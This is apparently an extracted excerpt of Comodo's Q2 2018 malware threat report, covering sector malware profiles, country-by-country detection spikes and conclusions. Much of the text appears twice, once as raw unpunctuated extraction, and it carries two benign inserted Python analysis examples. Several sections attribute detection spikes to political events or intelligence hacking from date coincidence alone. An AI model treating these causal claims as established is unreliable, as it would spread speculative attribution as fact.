Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis
In this section, let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. For each vertical, the diagram also lists the top malware family within that vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, which were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but that it now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites, and that it has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. One caveat when reading these reports: "Kryptik" is a generic detection name that several vendors apply to heavily packed or obfuscated trojans rather than to a single code base, which is why such different behaviours are attributed to it.

Second, let's examine "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Its source code leaked in 2011, and the variants built on it remain among the largest botnets on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is typically spread through drive-by downloads and email phishing, sometimes backed by a social-engineering scheme that falsely claims the target's computer is already infected and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found in every vertical and can be used for a wide variety of cyberattacks. Further, strategic analysis like this can be used to create a malware profile for each vertical, providing cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
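As an added example (not part of the Comodo report, and run over constructed sample counts rather than Comodo telemetry), the Python below computes the per-vertical profile described above: the dominant malware type in each vertical, the top family within that type, and the families that top more than one vertical, which is the criterion the text uses to call Kryptik and Zbot a strategic threat. The verticals, counts and placeholder family names other than Kryptik and Zbot are assumptions.

```python
"""Per-vertical malware profile, in the style of the Section 6 infographic.

The detection records below are constructed for illustration; they are
not Comodo data. Each record is (vertical, malware_type, family, count).
"""
from collections import Counter, defaultdict

# Constructed sample detections (assumption, not report data).
SAMPLE_DETECTIONS = [
    ("government",     "Trojan",   "Zbot",        120),
    ("government",     "Trojan",   "Kryptik",      70),
    ("government",     "Worm",     "WormFamilyA",  90),
    ("transportation", "Trojan",   "Zbot",         60),
    ("transportation", "Backdoor", "BackdoorX",    45),
    ("transportation", "Trojan",   "Kryptik",      30),
    ("retail",         "Virus",    "VirusY",       50),
    ("retail",         "Trojan",   "Kryptik",      40),
    ("retail",         "Virus",    "VirusZ",       25),
    ("education",      "Trojan",   "Kryptik",      55),
    ("education",      "Worm",     "WormFamilyA",  20),
    ("education",      "Trojan",   "Zbot",         15),
    ("healthcare",     "Trojan",   "Kryptik",      40),
    ("healthcare",     "Backdoor", "BackdoorX",    10),
]


def profile_verticals(records):
    """Return {vertical: {top_type, type_count, top_family, family_count}}.

    The top type is the one with the largest summed count in the vertical;
    the top family is the most-detected family *within that type*, which is
    how the report's infographic is organised. Ties resolve to the first
    entry seen, so sort the input if a stable tie rule matters.
    """
    by_vertical = defaultdict(lambda: defaultdict(Counter))
    for vertical, mtype, family, count in records:
        by_vertical[vertical][mtype][family] += count

    profiles = {}
    for vertical, types in by_vertical.items():
        type_totals = {t: sum(fams.values()) for t, fams in types.items()}
        top_type = max(type_totals, key=type_totals.get)
        top_family, family_count = types[top_type].most_common(1)[0]
        profiles[vertical] = {
            "top_type": top_type,
            "type_count": type_totals[top_type],
            "top_family": top_family,
            "family_count": family_count,
        }
    return profiles


def cross_vertical_families(profiles, min_verticals=2):
    """Families that are the top family in at least min_verticals verticals.

    This is the report's "strategic threat" test: a family that leads in
    several unrelated sectors is not a sector-specific problem.
    """
    verticals_by_family = defaultdict(list)
    for vertical, profile in profiles.items():
        verticals_by_family[profile["top_family"]].append(vertical)
    return {
        family: sorted(verticals)
        for family, verticals in verticals_by_family.items()
        if len(verticals) >= min_verticals
    }


if __name__ == "__main__":
    profiles = profile_verticals(SAMPLE_DETECTIONS)
    for vertical, p in sorted(profiles.items()):
        print(f"{vertical:15} top type {p['top_type']:9} ({p['type_count']})"
              f"  top family {p['top_family']} ({p['family_count']})")
    print("cross-vertical:", cross_vertical_families(profiles))
```

On the sample data the government and transportation verticals share Zbot as their top family and education and healthcare share Kryptik, while retail's top type is Virus and so contributes no trojan family; raising min_verticals is the knob for how widespread a family must be before it is treated as a cross-sector threat.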
7 Geopolitical Intelligence

7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out in this data. What happened in the US on that day that might help explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one plausible reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, comprising many requests for information on upcoming changes in US political, military and intelligence activities, and immediately set about fulfilling them through computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual daily number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo's further research identified the detected malware as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia
All major geopolitical events today are bathed in malware, because almost all activity, from social life to business, politics and national security affairs, is now conducted online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides ample evidence: Armenia's 2018 political revolution was accompanied by Comodo's largest malware detection within that country during Q2 2018.

7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this is provided by this timeline of Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April Iraq was preparing for a national election, including the conundrum of how best to secure its electronic dimension; at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have more than one explanation. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day and Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital, Kyiv, on May 26.

7.9 Croatia
Since the cyberattack on Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came just one day after the Russian government called Croatia's decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity revealed that it took place almost exclusively in Vantaa, a city adjoining Helsinki, precisely where the summit was scheduled to take place.
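Each of the country sections above reads a daily detection chart, picks out the tallest spike, and then looks for a news event on or near that date. As an added example (not from the Comodo report, and run over a constructed series rather than Comodo telemetry), the Python below makes both steps explicit: a spike is a day whose count exceeds a robust baseline (median plus a multiple of the median absolute deviation) by a minimum ratio, and each spike is then matched against an event calendar within a tolerance window. The dates, counts, event descriptions and thresholds are assumptions. Running it on the sample shows the check a practitioner wants before attributing a spike to an event: one spike has a candidate event nearby, one has none, and a modest rise on an event day is not a spike at all.

```python
"""Spike detection over a daily detection-count series, plus event matching.

All data below is constructed for illustration; it is not Comodo telemetry
and the events are placeholders.
"""
from datetime import date, timedelta
from statistics import median


def build_sample_series():
    """Thirty days of constructed counts from 2018-06-01: a flat baseline
    near 100 with an outlier on day 4, a mild rise on day 14 and a second
    outlier on day 20."""
    start = date(2018, 6, 1)
    counts = [100, 95, 110, 1200, 105, 98, 102, 97, 108, 101,
              99, 104, 96, 130, 103, 100, 94, 107, 102, 500,
              98, 101, 105, 99, 103, 97, 100, 106, 95, 102]
    return [(start + timedelta(days=i), c) for i, c in enumerate(counts)]


# Constructed event calendar (assumption): (date, description).
SAMPLE_EVENTS = [
    (date(2018, 6, 4), "anniversary of a politically sensitive event"),
    (date(2018, 6, 14), "new media legislation passed"),
]


def baseline(series):
    """Median and median absolute deviation (MAD) of the counts.

    Median/MAD rather than mean/stddev, so that the spikes we are looking
    for do not inflate the baseline they are measured against."""
    counts = [c for _, c in series]
    med = median(counts)
    mad = median(abs(c - med) for c in counts)
    return med, mad


def robust_spikes(series, k=5.0, min_ratio=3.0):
    """Return [(day, count, ratio_to_median)] for days that exceed
    median + k*MAD AND are at least min_ratio times the median.

    The second condition stops a near-flat series (tiny MAD) from
    flagging every small wobble as a spike."""
    med, mad = baseline(series)
    threshold = med + k * mad
    floor = max(med, 1.0)  # guard against a zero median
    return [(day, c, c / floor) for day, c in series
            if c > threshold and c >= min_ratio * floor]


def match_events(spikes, events, window_days=1):
    """Pair each spike with the events that fall within +/- window_days.

    An empty list means no candidate event in the calendar, which is the
    honest result when nothing lines up; co-occurrence alone never
    establishes that the event caused the spike."""
    matched = []
    for day, count, ratio in spikes:
        nearby = [desc for ev_day, desc in events
                  if abs((day - ev_day).days) <= window_days]
        matched.append((day, count, nearby))
    return matched


if __name__ == "__main__":
    series = build_sample_series()
    med, mad = baseline(series)
    print(f"baseline median={med} MAD={mad}")
    for day, count, nearby in match_events(robust_spikes(series), SAMPLE_EVENTS):
        print(day, count, "->", nearby or "no candidate event in window")
```

With the sample series the baseline is a median of 101.5 and a MAD of 3.5, so June 4 (1,200) and June 20 (500) are flagged while June 14 (130) is not, even though it is the day of the constructed legislation event; lowering min_ratio to 1.0 admits it. Only the June 4 spike has an event inside the one-day window, and the June 20 spike is left unexplained rather than forced onto the nearest headline.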
8 Conclusions
In Q2 Comodo Cybersecurity observed several significant new trends that are likely to strongly influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The rise in trojan malware last quarter implies that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact to be revealed in quarters to come. Trojans also serve as a delivery vector for other types of malware. Together, these facts point to a large surge in infections of hosts worldwide with a diverse range of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals' growing focus on hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED, COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com
EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in

About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
